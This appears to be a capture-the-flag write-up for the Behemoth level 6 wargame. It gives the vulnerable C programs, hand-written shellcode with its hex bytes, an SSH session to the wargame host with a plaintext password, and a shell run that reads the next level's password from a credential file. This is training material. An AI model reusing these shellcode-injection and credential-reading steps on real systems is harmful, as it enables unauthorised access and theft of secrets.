/* behemoth6.c */
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{
FILE *fp;
char *buf;
fp = popen("/behemoth/behemoth6_reader", "r");
if (fp == NULL) {
puts("Failed to create pipe.");
exit(0);
}
buf = (char *)malloc(10);
fread(buf, 10, 1, fp);
pclose(fp);
if (strcmp(buf, "HelloKitty")) {
puts("Incorrect output.");
return 0;
}
puts("Correct.");
execl("/bin/sh", "sh", NULL);
return 0;
}
/* behemoth6_reader.c */
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[])
{
FILE *fp; /* 0x20 */
int fsize; /* 0x24 */
void (*func)(void); /* 0x2c */
char *buf; /* 0x28 */
int i; /* 0x1c */
fp = fopen("shellcode.txt", "r");
if (fp == NULL) {
puts("Couldn't open shellcode.txt!");
return 0;
}
fseek(fp, 0, SEEK_END);
fsize = ftell(fp);
rewind(fp);
buf = (char *)malloc(fsize);
fread(buf, fsize, 1, fp);
fclose(fp);
i = 0;
while (i < fsize) {
if (buf[i] == 0x0b) {
puts("Write your own shellcode.");
exit(1);
}
i++;
}
func = (void (*)(void))buf;
(*func)();
return 0;
}; shellcode.asm
BITS 32
global _start
section .text
_start:
push 0x04 ; write
pop eax ; set SYS_WRITE to eax
xor ebx,ebx
inc ebx
xor esi, esi ; clean esi
push esi ; esi is zero
push 0x79747469 ; push 'itty <--'
push 0x4b6f6c6c ; push 'lloK <--'
push 0x65485555 ; push 'HeUU <--'
mov ecx, esp
inc ecx
inc ecx
mov edx,eax
add edx,eax
inc edx
inc edx
int 0x80
栈环境
root@today:~# nasm -f elf32 shellcode.asm -g -F stabs -o shellcode.o
root@today:~# ld -o shellcode shellcode.o -g
root@today:~# ./shellcode
HelloKittySegmentation fault
root@today:~# for i in $(objdump -d shellcode.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo
\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80
root@today:~# ssh behemoth6@178.79.134.250
behemoth6@178.79.134.250's password: mayiroeche
behemoth6@melinda:~$ cd /tmp
behemoth6@melinda:/tmp$ mkdir shui6
behemoth6@melinda:/tmp$ cd shui6
behemoth6@melinda:/tmp/shui6$ python -c 'print "\x6a\x04\x58\x31\xdb\x43\x31\xf6\x56\x68\x69\x74\x74\x79\x68\x6c\x6c\x6f\x4b\x68\x55\x55\x48\x65\x89\xe1\x41\x41\x89\xc2\x01\xc2\x42\x42\xcd\x80"' > shellcode.txt
behemoth6@melinda:/tmp/shui6$ /behemoth/behemoth6
Segmentation fault
Correct.
$ whoami
behemoth7
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo
$ exit
behemoth6.S
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x804857d <main> push %ebp │
│0x804857e <main+1> mov %esp,%ebp │
│0x8048580 <main+3> and $0xfffffff0,%esp │
│0x8048583 <main+6> sub $0x20,%esp │
│0x8048586 <main+9> movl $0x80486f0,0x4(%esp) │
│0x804858e <main+17> movl $0x80486f2,(%esp) │
│0x8048595 <main+24> call 0x80483f0 <popen@plt> │
│0x804859a <main+29> mov %eax,0x18(%esp) │
│0x804859e <main+33> cmpl $0x0,0x18(%esp) │
│0x80485a3 <main+38> jne 0x80485bd <main+64> │
│0x80485a5 <main+40> movl $0x804870d,(%esp) │
│0x80485ac <main+47> call 0x8048420 <puts@plt> │
│0x80485b1 <main+52> movl $0x0,(%esp) │
│0x80485b8 <main+59> call 0x8048440 <exit@plt> │
│0x80485bd <main+64> movl $0xa,(%esp) │
│0x80485c4 <main+71> call 0x8048410 <malloc@plt> │
│0x80485c9 <main+76> mov %eax,0x1c(%esp) │
│0x80485cd <main+80> mov 0x18(%esp),%eax │
│0x80485d1 <main+84> mov %eax,0xc(%esp) │
│0x80485d5 <main+88> movl $0x1,0x8(%esp) │
│0x80485dd <main+96> movl $0xa,0x4(%esp) │
│0x80485e5 <main+104> mov 0x1c(%esp),%eax │
│0x80485e9 <main+108> mov %eax,(%esp) │
│0x80485ec <main+111> call 0x8048400 <fread@plt> │
│0x80485f1 <main+116> mov 0x18(%esp),%eax │
│0x80485f5 <main+120> mov %eax,(%esp) │
│0x80485f8 <main+123> call 0x8048450 <pclose@plt> │
│0x80485fd <main+128> movl $0x8048724,0x4(%esp) │
│0x8048605 <main+136> mov 0x1c(%esp),%eax │
│0x8048609 <main+140> mov %eax,(%esp) │
│0x804860c <main+143> call 0x80483e0 <strcmp@plt> │
│0x8048611 <main+148> test %eax,%eax │
│0x8048613 <main+150> jne 0x804863f <main+194> │
│0x8048615 <main+152> movl $0x804872f,(%esp) │
│0x804861c <main+159> call 0x8048420 <puts@plt> │
│0x8048621 <main+164> movl $0x0,0x8(%esp) │
│0x8048629 <main+172> movl $0x8048738,0x4(%esp) │
│0x8048631 <main+180> movl $0x804873b,(%esp) │
│0x8048638 <main+187> call 0x8048470 <execl@plt> │
│0x804863d <main+192> jmp 0x804864b <main+206> │
│0x804863f <main+194> movl $0x8048743,(%esp) │
│0x8048646 <main+201> call 0x8048420 <puts@plt> │
│0x804864b <main+206> mov $0x0,%eax │
│0x8048650 <main+211> leave │
│0x8048651 <main+212> ret │
└─────────────────────────────────────────────────────────────────────────────────┘behemoth6_reader.S
┌─────────────────────────────────────────────────────────────────────────────────┐
│0x80485ad <main> push %ebp │
│0x80485ae <main+1> mov %esp,%ebp │
│0x80485b0 <main+3> and $0xfffffff0,%esp │
│0x80485b3 <main+6> sub $0x30,%esp │
│0x80485b6 <main+9> movl $0x8048750,0x4(%esp) │
│0x80485be <main+17> movl $0x8048752,(%esp) │
│0x80485c5 <main+24> call 0x80484a0 <fopen@plt> │
│0x80485ca <main+29> mov %eax,0x20(%esp) │
│0x80485ce <main+33> cmpl $0x0,0x20(%esp) │
│0x80485d3 <main+38> jne 0x80485e6 <main+57> │
│0x80485d5 <main+40> movl $0x8048760,(%esp) │
│0x80485dc <main+47> call 0x8048450 <puts@plt> │
│0x80485e1 <main+52> jmp 0x80486ae <main+257> │
│0x80485e6 <main+57> movl $0x2,0x8(%esp) │
│0x80485ee <main+65> movl $0x0,0x4(%esp) │
│0x80485f6 <main+73> mov 0x20(%esp),%eax │
│0x80485fa <main+77> mov %eax,(%esp) │
│0x80485fd <main+80> call 0x8048420 <fseek@plt> │
│0x8048602 <main+85> mov 0x20(%esp),%eax │
│0x8048606 <main+89> mov %eax,(%esp) │
│0x8048609 <main+92> call 0x8048490 <ftell@plt> │
│0x804860e <main+97> mov %eax,0x24(%esp) │
│0x8048612 <main+101> mov 0x20(%esp),%eax │
│0x8048616 <main+105> mov %eax,(%esp) │
│0x8048619 <main+108> call 0x8048410 <rewind@plt> │
│0x804861e <main+113> mov 0x24(%esp),%eax │
│0x8048622 <main+117> mov %eax,(%esp) │
│0x8048625 <main+120> call 0x8048440 <malloc@plt> │
│0x804862a <main+125> mov %eax,0x28(%esp) │
│0x804862e <main+129> mov 0x24(%esp),%eax │
│0x8048632 <main+133> mov 0x20(%esp),%edx │
│0x8048636 <main+137> mov %edx,0xc(%esp) │
│0x804863a <main+141> movl $0x1,0x8(%esp) │
│0x8048642 <main+149> mov %eax,0x4(%esp) │
│0x8048646 <main+153> mov 0x28(%esp),%eax │
│0x804864a <main+157> mov %eax,(%esp) │
│0x804864d <main+160> call 0x8048430 <fread@plt> │
│0x8048652 <main+165> mov 0x20(%esp),%eax │
│0x8048656 <main+169> mov %eax,(%esp) │
│0x8048659 <main+172> call 0x8048400 <fclose@plt> │
│0x804865e <main+177> movl $0x0,0x1c(%esp) │
│0x8048666 <main+185> jmp 0x8048696 <main+233> │
│0x8048668 <main+187> mov 0x1c(%esp),%edx │
│0x804866c <main+191> mov 0x28(%esp),%eax │
│0x8048670 <main+195> add %edx,%eax │
│0x8048672 <main+197> movzbl (%eax),%eax │
│0x8048675 <main+200> cmp $0xb,%al │
│0x8048677 <main+202> jne 0x8048691 <main+228> │
│0x8048679 <main+204> movl $0x804877d,(%esp) │
│0x8048680 <main+211> call 0x8048450 <puts@plt> │
│0x8048685 <main+216> movl $0x1,(%esp) │
│0x804868c <main+223> call 0x8048470 <exit@plt> │
│0x8048691 <main+228> addl $0x1,0x1c(%esp) │
│0x8048696 <main+233> mov 0x1c(%esp),%eax │
│0x804869a <main+237> cmp 0x24(%esp),%eax │
│0x804869e <main+241> jl 0x8048668 <main+187> │
│0x80486a0 <main+243> mov 0x28(%esp),%eax │
│0x80486a4 <main+247> mov %eax,0x2c(%esp) │
│0x80486a8 <main+251> mov 0x2c(%esp),%eax │
│0x80486ac <main+255> call *%eax │
│0x80486ae <main+257> mov $0x0,%eax │
│0x80486b3 <main+262> leave │
│0x80486b4 <main+263> ret │
└─────────────────────────────────────────────────────────────────────────────────┘
5875
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
